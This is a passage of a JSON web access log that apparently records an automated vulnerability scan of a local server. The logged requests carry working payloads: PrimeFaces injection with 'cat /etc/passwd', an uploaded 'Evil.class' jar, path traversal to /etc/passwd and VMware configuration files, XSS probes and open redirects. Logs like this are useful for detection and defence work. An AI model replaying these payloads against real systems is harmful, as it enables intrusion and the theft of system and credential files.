+0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2228fHqTfySstPVhauJK4UB7dYudK.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CDocuments+and+Settings\x5CAll+Users\x5CApplication+Data\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.315","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.636","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.708","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CvCenterServer\x5Ccfg\x5Cvmware-vpx\x5Cvcdb.properties HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.253","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.716","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.255","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/30 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.995","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.247","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.009","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js 